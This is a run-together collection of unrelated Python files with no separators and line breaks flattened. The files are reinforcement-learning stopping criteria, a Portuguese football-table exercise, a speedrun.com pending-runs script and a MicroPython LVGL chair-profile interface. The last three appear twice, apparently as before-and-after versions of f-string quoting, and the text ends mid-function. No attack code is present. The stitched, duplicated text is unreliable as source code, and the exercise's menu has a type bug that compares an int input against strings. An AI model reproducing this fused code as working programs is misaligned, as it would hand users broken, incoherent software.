defaults to median :param num_lookbacks: over how many iterations the statistic should be computed; for example, a value of two means that the rollouts of both the current and the previous iteration will be used for computing the statistic; defaults to one """ super().__init__() self._return_statistic = return_statistic self._num_lookbacks = num_lookbacks def _is_met_with_sampler(self, algo, sampler: RolloutSavingWrapper) -> bool: """ Computes the return statistic if enough iterations have passed and forwards the computed statistic to the method `_is_met_with_return_statistic`. :param algo: instance of `Algorithm` that has to be evaluated :param sampler: instance of `RolloutSavingWrapper`, the sampler of `algo`, that has to be evaluated :return: `True` if the criterion is met, and `False` otherwise """ if len(sampler.rollouts) < self._num_lookbacks: return False step_sequences = sampler.rollouts[-self._num_lookbacks :] returns = [rollout.undiscounted_return() for step_sequence in step_sequences for rollout in step_sequence] return_statistic = self._compute_return_statistic(np.asarray(returns)) return self._is_met_with_return_statistic(algo, sampler, return_statistic) @abstractmethod def _is_met_with_return_statistic(self, algo, sampler: RolloutSavingWrapper, return_statistic: float) -> bool: """ Checks whether the stopping criterion is met. .. note:: Has to be overwritten by sub-classes. :param algo: instance of `Algorithm` that has to be evaluated :param sampler: instance of `RolloutSavingWrapper`, the sampler of `algo`, that has to be evaluated :param return_statistic: statistic that has been computed for the latest rollouts :return: `True` if the criterion is met, and `False` otherwise """ raise NotImplementedError() def _compute_return_statistic(self, returns: np.ndarray) -> float: """ Computes the desired statistic of the given list of returns according to the statistic requested in the constructor. :param returns: returns :return: statistic """ if self._return_statistic is ReturnStatistic.min: return np.min(returns) if self._return_statistic is ReturnStatistic.max: return np.max(returns) if self._return_statistic is ReturnStatistic.median: return np.quantile(returns, q=0.50) if self._return_statistic is ReturnStatistic.mean: return np.mean(returns).item() if self._return_statistic is ReturnStatistic.variance: return returns.var().item() raise pyrado.ValueErr(msg=f"Unexpected return statistic {self._return_statistic}!") class MinReturnStoppingCriterion(ReturnStatisticBasedStoppingCriterion): """ Uses any statistic (defaulting to min) of the return of the latest rollout as a stopping criterion and stops if this statistic exceeds a certain threshold. """ def __init__(self, return_threshold: float, return_statistic: ReturnStatistic = ReturnStatistic.min): """ Constructor. :param return_threshold: return threshold; if the return statistic reaches this threshold, the stopping criterion is met :param return_statistic: statistic to compute; defaults to minimum """ super().__init__(return_statistic=return_statistic) self._return_threshold = return_threshold def __repr__(self) -> str: return f"MinReturnStoppingCriterion[return_statistic={self._return_statistic}, min_return={self._return_threshold}]" def __str__(self) -> str: return f"({self._return_statistic} return >= {self._return_threshold})" def _is_met_with_return_statistic(self, algo, sampler: RolloutSavingWrapper, return_statistic: float) -> bool: """Returns whether the return statistic is greater than or equal to the return threshold.""" return return_statistic >= self._return_threshold class ConvergenceStoppingCriterion(ReturnStatisticBasedStoppingCriterion): """ Checks for convergence of the returns for a given statistic that can be specified in the constructor. This is done by fitting a linear regression model to all the previous statistics (stored in a list) and performing a Wald test with a t-distribution of the test statistic (with the null hypothesis that the slope is zero). The resulting p-value is called the *probability of convergence* and is used for checking if the algorithm has converged. This procedure can intuitively be explained by measuring "how flat the returns are" in the presence of noise. It has the advantage over just checking how much the return changes that it is independent of the noise on the returns, i.e. no specific threshold has to be hand-tuned. This criterion has to modes: moving and cumulative. In the moving mode, only the latest `M` values are used for fitting the linear model, and in the first `M - 1` iterations the criterion is treated as not being met. In the cumulative mode, all the previous values are used and only the first iteration is treated as not being met as there have to be at least two points to fit a linear model. While the former is primarily useful for convergence checking for a regular algorithm, the latter is primarily useful for checking convergence of the subroutine in a meta-algorithm as here it is possible that convergence kicks in far at the beginning of the learning process as the environment did not change much (see for example SPRL). It might be helpful to use this stopping criterion in conjunction with an iterations criterion (`IterCountStoppingCriterion`) to ensure that the algorithm does not terminate prematurely due to initialization issues. For example, PPO usually takes some iterations to make progress which leads to a flat learning curve that however does not correspond to the algorithm being converged. """ def __init__( self, convergence_probability_threshold: float = 0.99, num_iter: Optional[int] = None, return_statistic: ReturnStatistic = ReturnStatistic.median, num_lookbacks: int = 1, ): """ Constructor. :param convergence_probability_threshold: threshold of the p-value above which the algorithm is considered to be converged; defaults to `0.99`, i.e. a `99%` certainty that the data can be explained :param num_iter: number of iterations to use for the moving mode. If `None`, the cumulative mode is used :param return_statistic: statistic to compute; defaults to median :param num_lookbacks: over how many iterations the statistic should be computed; for example, a value of two means that the rollouts of both the current and the previous iteration will be used for computing the statistic; defaults to one """ super().__init__(return_statistic, num_lookbacks) if not (num_iter is None or num_iter > 0): raise pyrado.ValueErr(msg="M must be either None or a positive number.") self._convergence_probability_threshold = convergence_probability_threshold self._num_iter = num_iter self._return_statistic_history = [] def __repr__(self) -> str: return ( f"ConvergenceStoppingCriterion[" f"convergence_probability_threshold={self._convergence_probability_threshold}, " f"num_iter={self._num_iter}, " f"return_statistic={self._return_statistic}, " f"num_lookbacks={self._num_lookbacks}, " f"return_statistic_history={self._return_statistic_history}]" ) def __str__(self) -> str: return ( f"({self._return_statistic} return converged, {'cumulative' if self._num_iter is None else 'moving'} mode)" ) def _reset(self) -> NoReturn: self._return_statistic_history = [] def _is_met_with_return_statistic(self, algo, sampler: RolloutSavingWrapper, return_statistic: float) -> bool: """Returns whether the convergence probability is greater than or equal to the threshold.""" self._return_statistic_history.append(return_statistic) convergence_prob = self._compute_convergence_probability() if convergence_prob is None: return False return convergence_prob >= self._convergence_probability_threshold def _compute_convergence_probability(self) -> Optional[float]: """ Computes the convergence probability for the current data. By invoking `_get_relevant_return_statistic_subset`, the two modes (moving and cumulative) are implemented. If not enough data is present, this method does not return the probability, but `None`. .. note:: This invoked the method `linregress` of `scipy.stats` and returns the corresponing p-value. .. seealso:: https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.linregress.html :return the convergence probability or `None` if not enough data is present """ statistic_subset = self._get_relevant_return_statistic_subset() if statistic_subset is None: return None return sp.stats.linregress(range(len(statistic_subset)), statistic_subset).pvalue def _get_relevant_return_statistic_subset(self) -> Optional[List[float]]: """ Extracts the relevant subset of the return statistic history, implementing the two modes described in the class documentation: moving and cumulative. If either the return history is empty or does not contain enough elements for getting `M` elements, `None` is returned. The convergence checking method shall treat this as the convergence criterion not being met as there is not enough data. :return: the relevant subset """ if len(self._return_statistic_history) <= 0: return None if self._num_iter is None: return self._return_statistic_history if len(self._return_statistic_history) < self._num_iter: return None return self._return_statistic_history[-self._num_iter :]
# 73 # Crie uma tupla preenchida com os 20 primeiros colocados da Tabela do Campeonato Brasileiro de Futebol, na ordem de colocação. Depois mostre: a) Os 5 primeiros times. b) Os últimos 4 colocados. c) Times em ordem alfabética. d) Em que posição está o time da Chapecoense. times = ('Corinthians', 'Palmeiras', 'Santos', 'Grêmio', 'Cruzeiro', 'Flamengo', 'Vasco', 'Chapecoense', 'Atlético', 'Botafogo', 'Altético-PR', 'Bahia', 'São Paulo', 'Fluminense', 'Sport Recife', 'EC Vitória', 'Coritiba', 'Avaí', 'Ponte Preta', 'Atlético-GO') ## Outra forma de exibir a lista de times # print('Lista de times do Brasileirão: ',end='') # for t in times: # print(t,end=', ') # print('-=' * 50) # print(f'Lista de times do Brasileirão: {times}.') # print('-=' * 50) # print(f'Os 5 primeiros são: {times[0:5]}.') # print('-=' * 50) # print(f'Os 4 últimos são: {times[-4:]}.') # print('-=' * 50) # print(f'Times em ordem alfabética: {sorted(times)}.') # print('-=' * 50) # print(f'A Chapecoense está na {times.index('Chapecoense')+1}ª posição.') # print('-=' * 50) # 2° form - with menu from time import sleep while True: print('-=' * 25) print('\t\t\33[32mBRASILEIRÃO\33[m') print('-=' * 25) opc = (input( '[1] - Mostrar a classificacao\n' '[2] - Mostrar os 5 primeiros\n' '[3] - Mostrar os 4 últimos\n' '[4] - Times em ordem alfabetica\n' '[5] - Posicao da Chapecoense\n' '[6] - Sair\n' 'Escolha uma opção: ')) while opc not in '123456': print('Opcao invalida.') opc = int(input( '[1] - Mostrar a classificacao\n' '[2] - Mostrar os 5 primeiros\n' '[3] - Mostrar os 4 últimos\n' '[4] - Times em ordem alfabetica\n' '[5] - Posicao da Chapecoense \n' '[6] - Sair\n' 'Escolha uma opção: ')) if opc == '1': print('Lista de times do Brasileirão: ') for pos, c in enumerate (times): print(f' {pos+1} {c}') if opc == '2': print('Os 5 primeiros são: ') for pos, cont in enumerate (times[0:5]): print(f'{pos+1} {cont}') if opc == '3': print('Os 4 últimos são: ') for z4 in (times[-4:]): print(f'{z4}') if opc == '4': print('Times em ordem alfabética: ',end='') print(sorted(times)) if opc == '5': print('A Chapecoense está na ',end='') for pos, c in enumerate (times): if c == 'Chapecoense': print(f'{pos+1}ª posição.') if opc == '6': print('Você escolheu sair do programa.') break resp = str(input('\nQuer Continuar? [S/N] ')).upper().strip()[0] while resp not in 'SN': print('\33[31mOpção inválida\33[m') resp = str(input('Quer Continuar? [S/N] ')).upper().strip()[0] if resp == 'N': break print('\n') sleep(0.5) print('Desligando...')
# 73 # Crie uma tupla preenchida com os 20 primeiros colocados da Tabela do Campeonato Brasileiro de Futebol, na ordem de colocação. Depois mostre: a) Os 5 primeiros times. b) Os últimos 4 colocados. c) Times em ordem alfabética. d) Em que posição está o time da Chapecoense. times = ('Corinthians', 'Palmeiras', 'Santos', 'Grêmio', 'Cruzeiro', 'Flamengo', 'Vasco', 'Chapecoense', 'Atlético', 'Botafogo', 'Altético-PR', 'Bahia', 'São Paulo', 'Fluminense', 'Sport Recife', 'EC Vitória', 'Coritiba', 'Avaí', 'Ponte Preta', 'Atlético-GO') ## Outra forma de exibir a lista de times # print('Lista de times do Brasileirão: ',end='') # for t in times: # print(t,end=', ') # print('-=' * 50) # print(f'Lista de times do Brasileirão: {times}.') # print('-=' * 50) # print(f'Os 5 primeiros são: {times[0:5]}.') # print('-=' * 50) # print(f'Os 4 últimos são: {times[-4:]}.') # print('-=' * 50) # print(f'Times em ordem alfabética: {sorted(times)}.') # print('-=' * 50) # print(f'A Chapecoense está na {times.index("Chapecoense")+1}ª posição.') # print('-=' * 50) # 2° form - with menu from time import sleep while True: print('-=' * 25) print('\t\t\33[32mBRASILEIRÃO\33[m') print('-=' * 25) opc = (input( '[1] - Mostrar a classificacao\n' '[2] - Mostrar os 5 primeiros\n' '[3] - Mostrar os 4 últimos\n' '[4] - Times em ordem alfabetica\n' '[5] - Posicao da Chapecoense\n' '[6] - Sair\n' 'Escolha uma opção: ')) while opc not in '123456': print('Opcao invalida.') opc = int(input( '[1] - Mostrar a classificacao\n' '[2] - Mostrar os 5 primeiros\n' '[3] - Mostrar os 4 últimos\n' '[4] - Times em ordem alfabetica\n' '[5] - Posicao da Chapecoense \n' '[6] - Sair\n' 'Escolha uma opção: ')) if opc == '1': print('Lista de times do Brasileirão: ') for pos, c in enumerate (times): print(f' {pos+1} {c}') if opc == '2': print('Os 5 primeiros são: ') for pos, cont in enumerate (times[0:5]): print(f'{pos+1} {cont}') if opc == '3': print('Os 4 últimos são: ') for z4 in (times[-4:]): print(f'{z4}') if opc == '4': print('Times em ordem alfabética: ',end='') print(sorted(times)) if opc == '5': print('A Chapecoense está na ',end='') for pos, c in enumerate (times): if c == 'Chapecoense': print(f'{pos+1}ª posição.') if opc == '6': print('Você escolheu sair do programa.') break resp = str(input('\nQuer Continuar? [S/N] ')).upper().strip()[0] while resp not in 'SN': print('\33[31mOpção inválida\33[m') resp = str(input('Quer Continuar? [S/N] ')).upper().strip()[0] if resp == 'N': break print('\n') sleep(0.5) print('Desligando...')
#!/usr/bin/env python3.9 """ This program returns a complete list of all the runs awaiting verificaiton for a given game (argv[1]) and optionally a second given game (argv[2]). """ from datetime import timedelta from sys import argv, exit, stderr from traceback import print_exception from typing import Literal from utils import * USAGE = ( "Usage: `+pending [GAME] [GAME (Optional)]`\n" + "Example: `+pending mkw mkwextracategories`" ) def get_pending(game: str) -> list[dict]: _, gid = getgame(game) r = api_get( f"{API}/runs", params={ "game": gid, "status": "new", "max": 200, "embed": "category,players,level", "orderby": "submitted", }, ) runs: list[dict] = [] while True: runs.extend(r["data"]) if "pagination" not in r or r["pagination"]["size"] < 200: break r = api_get( {item["rel"]: item["uri"] for item in r["pagination"]["links"]}["next"], ) return runs def main() -> int: if not (1 < len(argv) < 4): usage(USAGE) runs: list[dict] = [] for game in argv[1:]: runs.extend(get_pending(game)) if not runs: print("No pending runs found") return EXIT_SUCCESS print( "\n".join( f"[{run["level"]["data"]["name"] + ": " + run["category"]["data"]["name"] if run["level"]["data"] else run["category"]["data"]["name"]}]({run["weblink"]})" f" in `{str(timedelta(seconds=run["times"]["primary_t"])).replace("000","")}` by" f" {" and ".join([ player["name"] if player["rel"] == "guest" else player["names"]["international"] for player in run["players"]["data"]])}" for run in runs ) ) return EXIT_SUCCESS if __name__ == "__main__": exit(main())
#!/usr/bin/env python3.9 """ This program returns a complete list of all the runs awaiting verificaiton for a given game (argv[1]) and optionally a second given game (argv[2]). """ from datetime import timedelta from sys import argv, exit, stderr from traceback import print_exception from typing import Literal from utils import * USAGE = ( "Usage: `+pending [GAME] [GAME (Optional)]`\n" + "Example: `+pending mkw mkwextracategories`" ) def get_pending(game: str) -> list[dict]: _, gid = getgame(game) r = api_get( f"{API}/runs", params={ "game": gid, "status": "new", "max": 200, "embed": "category,players,level", "orderby": "submitted", }, ) runs: list[dict] = [] while True: runs.extend(r["data"]) if "pagination" not in r or r["pagination"]["size"] < 200: break r = api_get( {item["rel"]: item["uri"] for item in r["pagination"]["links"]}["next"], ) return runs def main() -> int: if not (1 < len(argv) < 4): usage(USAGE) runs: list[dict] = [] for game in argv[1:]: runs.extend(get_pending(game)) if not runs: print("No pending runs found") return EXIT_SUCCESS print( "\n".join( f"[{run['level']['data']['name'] + ': ' + run['category']['data']['name'] if run['level']['data'] else run['category']['data']['name']}]({run['weblink']})" f" in `{str(timedelta(seconds=run['times']['primary_t'])).replace('000','')}` by" f" {' and '.join([ player['name'] if player['rel'] == 'guest' else player['names']['international'] for player in run['players']['data']])}" for run in runs ) ) return EXIT_SUCCESS if __name__ == "__main__": exit(main())
import lvgl as lv import ujson as json from cdp import fsm, group, scr, _users_list, motor_pines, turn_counter from cdp.classes import Usuario from utime import sleep, sleep_ms import lodepng as png from imagetools import get_png_info, open_png def draw_calib_screen(which): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(75,16) h.set_text("Calibrando...") i = lv.label(scr) i.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) if which == 'bar': i.set_pos(40, 120) i.set_text("Instrucciones de barra") elif which == 'assheight': i.set_pos(55, 120) i.set_text("Instrucciones de \naltura de asiento") elif which == 'assdepth': i.set_pos(35, 120) i.set_text("Instrucciones de \nprofundidad de asiento") elif which == 'lumbar': i.set_pos(30, 120) i.set_text("Instrucciones de lumbar") elif which == 'cabezal': i.set_pos(30, 120) i.set_text("Instrucciones de cabezal") elif which == 'apbrazo': i.set_pos(10, 120) i.set_text("Instrucciones de apoyabrazos") s = lv.spinner(scr, 2000, 40) s.set_size(60, 60) s.set_pos(85, 200) lv.scr_load(scr) from cdp.helper import setup_motors_to_position with open('008-man.png', 'rb') as i: png_data = i.read() png_img_dsc = lv.img_dsc_t({ 'data_size': len(png_data), 'data': png_data }) raw_dsc = lv.img_dsc_t() get_png_info(None, png_img_dsc, raw_dsc.header) dsc = lv.img_decoder_dsc_t({'src': png_img_dsc}) if open_png(None, dsc) == lv.RES.OK: raw_dsc.data = dsc.img_data raw_dsc.data_size = raw_dsc.header.w * raw_dsc.header.h * lv.color_t.__SIZE__ # ===== CALLBACKS ===== # def users_cb(event): draw_users_screen(_users_list) def calibration_cb(event): fsm.State = 2 # CALIBRATING def calib_name_cb(event, new_pos, kb): username = kb.get_textarea().get_text() new_user = Usuario(username, '008-man.png', new_pos) _users_list.append(new_user) group.set_editing(False) fsm.State = 3 # CALIBRATION_END def profile_cb(event, username, usericon): draw_edit_screen(username, usericon) def delete_user_cb(event, username, usericon): draw_delete_screen(username, usericon) def select_profile_cb(event, username, usericon): draw_profilewait_screen(username, usericon) for user in _users_list: if user.nombre == username: print(f"Configurando {username}") setup_motors_to_position(motor_pines['Atras'], turn_counter) setup_motors_to_position(motor_pines['Adelante'], turn_counter, user.dict_posicion) fsm.State = 4 def edit_user_name_cb(event, username, usericon): draw_editname_screen(username, usericon) group.set_editing(False) def edit_profile_name_cb(event, username, usericon, kb): new_username = kb.get_textarea().get_text() draw_profilewait_screen(new_username, usericon) for i, user in enumerate(_users_list): if user.nombre == username: user.edit(new_username, usericon) group.set_editing(False) draw_edit_screen(new_username, usericon) def delete_profile_cb(event, username, usericon): draw_profilewait_screen(username, usericon) for i, user in enumerate(_users_list): if user.nombre == username: user.delete() del _users_list[i] fsm.State = 4 # ===== DIBUJAR PANTALLAS ===== # def draw_edit_screen(username, usericon): group.remove_all_objs() lv.obj.clean(scr) h1 = lv.label(scr) h1.set_pos(96, 16) h1.set_text("Perfil") h1 = lv.label(scr) h1.set_pos(145, 80) h1.set_text(username) img = lv.img(scr) img.set_pos(40, 72) img.set_zoom(256+256) img.set_src(raw_dsc) # Agregar botones btn = lv.btn(scr) btn.set_pos(16, 150) btn.set_width(200) lv.btn.add_event_cb(btn, lambda e: select_profile_cb(e, username, usericon), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text(lv.SYMBOL.OK + " Seleccionar perfil") lv.group_t.add_obj(group, btn) btn = lv.btn(scr) btn.set_pos(16, 190) btn.set_width(200) lv.btn.add_event_cb(btn, lambda e: edit_user_name_cb(e, username, usericon), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text(lv.SYMBOL.EDIT + " Editar nombre") lv.group_t.add_obj(group, btn) btn = lv.btn(scr) btn.set_pos(16, 230) btn.set_width(200) lv.btn.add_event_cb(btn, users_cb, lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text(lv.SYMBOL.LEFT + " Volver atras") lv.group_t.add_obj(group, btn) btn = lv.btn(scr) btn.set_pos(16, 270) btn.set_width(200) lv.btn.add_event_cb(btn, lambda e: delete_user_cb(e, username, usericon), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text(lv.SYMBOL.TRASH + " Borrar perfil") lv.group_t.add_obj(group, btn) lv.scr_load(scr) def draw_editname_screen(username, usericon): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(65, 16) h.set_text("Editar nombre") name_ta = lv.textarea(scr) name_ta.set_placeholder_text("Nuevo nombre") name_ta.set_one_line(True) name_ta.set_pos(20, 45) name_ta.set_width(200) btn = lv.btn(scr) btn.set_pos(65, 110) lv.btn.add_event_cb(btn, lambda e: profile_cb(e, username, usericon), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text("Volver atras") kb = lv.keyboard(scr) kb.add_event_cb(lambda e: edit_profile_name_cb(e, username, usericon, kb), lv.EVENT.READY, None) kb.set_size(240, 320 // 2) kb.set_textarea(name_ta) group.add_obj(name_ta) group.add_obj(btn) group.add_obj(kb) lv.scr_load(scr) def draw_delete_screen(username, usericon): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(75, 16) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text(f"Borrar perfil\n\n{lv.SYMBOL.WARNING + " " + username + " " + lv.SYMBOL.WARNING}") h = lv.label(scr) h.set_pos(25, 80) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("Esta accion es irreversible.\nConfirme su eleccion.") btn = lv.btn(scr) btn.set_pos(20, 140) lv.btn.add_event_cb(btn, lambda e: delete_profile_cb(e, username, usericon), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text("Borrar") group.add_obj(btn) btn = lv.btn(scr) btn.set_pos(132, 140) lv.btn.add_event_cb(btn, lambda e: profile_cb(e, username, usericon), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text("Cancelar") group.add_obj(btn) lv.scr_load(scr) def draw_profilewait_screen(username, usericon): lv.obj.clean(scr) h = lv.label(scr) h.set_pos(70, 16) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("Configuracion") h = lv.label(scr) h.set_pos(25, 120) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("Por favor, espere mientras\n se configura este perfil:") h = lv.label(scr) h.set_pos(145, 208) h.set_text(username) # Cargar imagen png img = lv.img(scr) img.set_pos(40, 200) img.set_zoom(256+256) img.set_src(raw_dsc) lv.scr_load(scr) def draw_users_screen(users): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(90, 15) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("Usuarios") h = lv.label(scr) h.set_pos(64, 75) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("Seleccione uno") panel = lv.obj(scr) panel.set_pos(10, 100) panel.set_size(220, 190) panel.set_scroll_snap_x(lv.SCROLL_SNAP.CENTER) panel.set_flex_flow(lv.FLEX_FLOW.ROW) for user in users: btn = lv.btn(panel) btn.set_size(150, 150) btn.center() lv.btn.add_event_cb(btn, lambda e: profile_cb(e, user.nombre, user.icon), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text(user.nombre) label.center() group.add_obj(btn) btn = lv.btn(panel) btn.set_size(150, 150) btn.center() lv.btn.add_event_cb(btn, lambda e: calibration_cb(e), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text(lv.SYMBOL.PLUS) label.center() group.add_obj(btn) panel.update_snap(lv.ANIM.ON) lv.scr_load(scr) def draw_calibname_screen(new_pos): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(65, 16) h.set_text("Elegir nombre") name_ta = lv.textarea(scr) name_ta.set_placeholder_text("Nuevo perfil") name_ta.set_one_line(True) name_ta.set_pos(20, 45) name_ta.set_width(200) kb = lv.keyboard(scr) kb.add_event_cb(lambda e: calib_name_cb(e, new_pos, kb), lv.EVENT.READY, None) kb.set_size(240, 320 // 2) kb.set_textarea(name_ta) group.add_obj(name_ta) group.add_obj(kb) lv.scr_load(scr) def draw_loading_screen(): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(95, 16) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("C.D.P.") s = lv.spinner(scr, 1000, 60) s.set_size(100, 100) s.center() h = lv.label(scr) h.set_pos(85, 220) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("Cargando...") lv.scr_load(scr)
import lvgl as lv import ujson as json from cdp import fsm, group, scr, _users_list, motor_pines, turn_counter from cdp.classes import Usuario from utime import sleep, sleep_ms import lodepng as png from imagetools import get_png_info, open_png def draw_calib_screen(which): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(75,16) h.set_text("Calibrando...") i = lv.label(scr) i.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) if which == 'bar': i.set_pos(40, 120) i.set_text("Instrucciones de barra") elif which == 'assheight': i.set_pos(55, 120) i.set_text("Instrucciones de \naltura de asiento") elif which == 'assdepth': i.set_pos(35, 120) i.set_text("Instrucciones de \nprofundidad de asiento") elif which == 'lumbar': i.set_pos(30, 120) i.set_text("Instrucciones de lumbar") elif which == 'cabezal': i.set_pos(30, 120) i.set_text("Instrucciones de cabezal") elif which == 'apbrazo': i.set_pos(10, 120) i.set_text("Instrucciones de apoyabrazos") s = lv.spinner(scr, 2000, 40) s.set_size(60, 60) s.set_pos(85, 200) lv.scr_load(scr) from cdp.helper import setup_motors_to_position with open('008-man.png', 'rb') as i: png_data = i.read() png_img_dsc = lv.img_dsc_t({ 'data_size': len(png_data), 'data': png_data }) raw_dsc = lv.img_dsc_t() get_png_info(None, png_img_dsc, raw_dsc.header) dsc = lv.img_decoder_dsc_t({'src': png_img_dsc}) if open_png(None, dsc) == lv.RES.OK: raw_dsc.data = dsc.img_data raw_dsc.data_size = raw_dsc.header.w * raw_dsc.header.h * lv.color_t.__SIZE__ # ===== CALLBACKS ===== # def users_cb(event): draw_users_screen(_users_list) def calibration_cb(event): fsm.State = 2 # CALIBRATING def calib_name_cb(event, new_pos, kb): username = kb.get_textarea().get_text() new_user = Usuario(username, '008-man.png', new_pos) _users_list.append(new_user) group.set_editing(False) fsm.State = 3 # CALIBRATION_END def profile_cb(event, username, usericon): draw_edit_screen(username, usericon) def delete_user_cb(event, username, usericon): draw_delete_screen(username, usericon) def select_profile_cb(event, username, usericon): draw_profilewait_screen(username, usericon) for user in _users_list: if user.nombre == username: print(f"Configurando {username}") setup_motors_to_position(motor_pines['Atras'], turn_counter) setup_motors_to_position(motor_pines['Adelante'], turn_counter, user.dict_posicion) fsm.State = 4 def edit_user_name_cb(event, username, usericon): draw_editname_screen(username, usericon) group.set_editing(False) def edit_profile_name_cb(event, username, usericon, kb): new_username = kb.get_textarea().get_text() draw_profilewait_screen(new_username, usericon) for i, user in enumerate(_users_list): if user.nombre == username: user.edit(new_username, usericon) group.set_editing(False) draw_edit_screen(new_username, usericon) def delete_profile_cb(event, username, usericon): draw_profilewait_screen(username, usericon) for i, user in enumerate(_users_list): if user.nombre == username: user.delete() del _users_list[i] fsm.State = 4 # ===== DIBUJAR PANTALLAS ===== # def draw_edit_screen(username, usericon): group.remove_all_objs() lv.obj.clean(scr) h1 = lv.label(scr) h1.set_pos(96, 16) h1.set_text("Perfil") h1 = lv.label(scr) h1.set_pos(145, 80) h1.set_text(username) img = lv.img(scr) img.set_pos(40, 72) img.set_zoom(256+256) img.set_src(raw_dsc) # Agregar botones btn = lv.btn(scr) btn.set_pos(16, 150) btn.set_width(200) lv.btn.add_event_cb(btn, lambda e: select_profile_cb(e, username, usericon), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text(lv.SYMBOL.OK + " Seleccionar perfil") lv.group_t.add_obj(group, btn) btn = lv.btn(scr) btn.set_pos(16, 190) btn.set_width(200) lv.btn.add_event_cb(btn, lambda e: edit_user_name_cb(e, username, usericon), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text(lv.SYMBOL.EDIT + " Editar nombre") lv.group_t.add_obj(group, btn) btn = lv.btn(scr) btn.set_pos(16, 230) btn.set_width(200) lv.btn.add_event_cb(btn, users_cb, lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text(lv.SYMBOL.LEFT + " Volver atras") lv.group_t.add_obj(group, btn) btn = lv.btn(scr) btn.set_pos(16, 270) btn.set_width(200) lv.btn.add_event_cb(btn, lambda e: delete_user_cb(e, username, usericon), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text(lv.SYMBOL.TRASH + " Borrar perfil") lv.group_t.add_obj(group, btn) lv.scr_load(scr) def draw_editname_screen(username, usericon): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(65, 16) h.set_text("Editar nombre") name_ta = lv.textarea(scr) name_ta.set_placeholder_text("Nuevo nombre") name_ta.set_one_line(True) name_ta.set_pos(20, 45) name_ta.set_width(200) btn = lv.btn(scr) btn.set_pos(65, 110) lv.btn.add_event_cb(btn, lambda e: profile_cb(e, username, usericon), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text("Volver atras") kb = lv.keyboard(scr) kb.add_event_cb(lambda e: edit_profile_name_cb(e, username, usericon, kb), lv.EVENT.READY, None) kb.set_size(240, 320 // 2) kb.set_textarea(name_ta) group.add_obj(name_ta) group.add_obj(btn) group.add_obj(kb) lv.scr_load(scr) def draw_delete_screen(username, usericon): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(75, 16) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text(f"Borrar perfil\n\n{lv.SYMBOL.WARNING + ' ' + username + ' ' + lv.SYMBOL.WARNING}") h = lv.label(scr) h.set_pos(25, 80) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("Esta accion es irreversible.\nConfirme su eleccion.") btn = lv.btn(scr) btn.set_pos(20, 140) lv.btn.add_event_cb(btn, lambda e: delete_profile_cb(e, username, usericon), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text("Borrar") group.add_obj(btn) btn = lv.btn(scr) btn.set_pos(132, 140) lv.btn.add_event_cb(btn, lambda e: profile_cb(e, username, usericon), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text("Cancelar") group.add_obj(btn) lv.scr_load(scr) def draw_profilewait_screen(username, usericon): lv.obj.clean(scr) h = lv.label(scr) h.set_pos(70, 16) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("Configuracion") h = lv.label(scr) h.set_pos(25, 120) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("Por favor, espere mientras\n se configura este perfil:") h = lv.label(scr) h.set_pos(145, 208) h.set_text(username) # Cargar imagen png img = lv.img(scr) img.set_pos(40, 200) img.set_zoom(256+256) img.set_src(raw_dsc) lv.scr_load(scr) def draw_users_screen(users): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(90, 15) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("Usuarios") h = lv.label(scr) h.set_pos(64, 75) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("Seleccione uno") panel = lv.obj(scr) panel.set_pos(10, 100) panel.set_size(220, 190) panel.set_scroll_snap_x(lv.SCROLL_SNAP.CENTER) panel.set_flex_flow(lv.FLEX_FLOW.ROW) for user in users: btn = lv.btn(panel) btn.set_size(150, 150) btn.center() lv.btn.add_event_cb(btn, lambda e: profile_cb(e, user.nombre, user.icon), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text(user.nombre) label.center() group.add_obj(btn) btn = lv.btn(panel) btn.set_size(150, 150) btn.center() lv.btn.add_event_cb(btn, lambda e: calibration_cb(e), lv.EVENT.PRESSED, None) label = lv.label(btn) 